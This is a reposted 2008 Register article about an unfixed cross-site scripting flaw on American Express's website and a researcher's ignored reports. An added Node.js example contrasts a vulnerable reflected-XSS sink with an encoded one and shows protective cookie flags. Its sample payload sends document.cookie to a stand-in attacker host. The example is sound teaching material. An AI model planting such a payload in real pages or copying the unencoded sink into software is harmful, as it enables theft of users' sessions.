http://www.theregister.co.uk/2008/12/16/american_express_website_bug/

By Dan Goodin in San Francisco
The Register
16th December 2008

Updated - A glaring vulnerability on the American Express website has unnecessarily put visitors at risk for more than two weeks and violates industry regulations governing credit card companies, a security researcher says.

Among other things, the cross-site scripting (XSS) error on americanexpress.com allows attackers to steal users' authentication cookies, which are used to validate American Express customers after they enter their login credentials. Depending on how the website is designed, miscreants could use the cookies to access customer account sections, said Russ McRee of the Holistic Security blog. A URL demonstrating this weakness is here.

McRee aired the American Express dirty laundry here after spending more than two weeks trying in vain to get someone inside the company to fix the problem. After getting no response from lower level employees, he emailed a director of a department responsible for information security at Amex. None of his emails was answered.

"I believe they have an obligation to respond, even if it's brief and callous," McRee told El Reg. "You don't have to be polite. Just fix it."

American Express proudly proclaims itself as a founding member of the PCI Security Standards Council, the group that forges the rules governing the Payment Card Industry. McRee says PCI's Data Security Standards expressly hold that XSS errors are a violation of those rules, so Amex's inaction carries a fair amount of irony.

[...]

_______________________________________________
Help InfoSecNews.org with a donation!
http://www.infosecnews.org/donate.html

Received on Thu Dec 18 2008 - 01:27:20 PST
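As an added example (it is not from the article, from McRee's write-up, or from the American Express site), the Node.js snippet below shows the class of bug the piece describes, a reflected XSS sink that pastes a query parameter into the page, next to the same sink with output encoding, and then the Set-Cookie attributes that keep a session cookie out of document.cookie even when such a bug ships. The function names, the search-page fragment, the cookie name, the sample payload and the attacker host are all constructed for illustration and are not taken from the real site.

```javascript
// Added example, not code from The Register, McRee, or American Express.
// Names, markup and the sample payload are constructed for illustration.

// HTML-encode the characters that change meaning in element text and in
// double- or single-quoted attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable sink: the search term from the query string lands in the page
// unchanged, so a crafted link becomes script running in the site's origin
// and can read document.cookie (the bug class the article describes).
function renderSearchVulnerable(term) {
  return `<p>Results for: ${term}</p>`;
}

// Hardened sink: encode before interpolation; the payload is shown as text.
function renderSearchHardened(term) {
  return `<p>Results for: ${escapeHtml(term)}</p>`;
}

// Build a Set-Cookie header for the session token. HttpOnly keeps the value
// out of document.cookie, so script injected via XSS cannot read it and ship
// it to another host; Secure keeps it off plain HTTP. SameSite is a later
// browser attribute (not around in 2008) included as current practice.
function sessionCookieHeader(name, value, { httpOnly = true, secure = true } = {}) {
  const parts = [`${name}=${encodeURIComponent(value)}`, 'Path=/', 'SameSite=Lax'];
  if (secure) parts.push('Secure');
  if (httpOnly) parts.push('HttpOnly');
  return parts.join('; ');
}

// Check a captured Set-Cookie header for both protective attributes
// (attribute names are case-insensitive per RFC 6265).
function cookieIsProtected(header) {
  const attrs = header.split(';').map((p) => p.trim().toLowerCase());
  return attrs.includes('httponly') && attrs.includes('secure');
}

// Constructed attacker payload of the "exfiltrate document.cookie" variety.
const PAYLOAD =
  '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>';

console.log(renderSearchVulnerable(PAYLOAD));   // script tag survives intact
console.log(renderSearchHardened(PAYLOAD));     // rendered as inert text
console.log(sessionCookieHeader('session', 'abc123'));
```

Two caveats a reviewer would attach: the real fix is the encoding in renderSearchHardened (or a templating layer that encodes by default), and HttpOnly is defence in depth only. Injected script that cannot read the cookie can still issue requests from the victim's browser, which carries the cookie automatically, so the "access customer account sections" risk the article mentions is reduced but not removed by cookie flags alone.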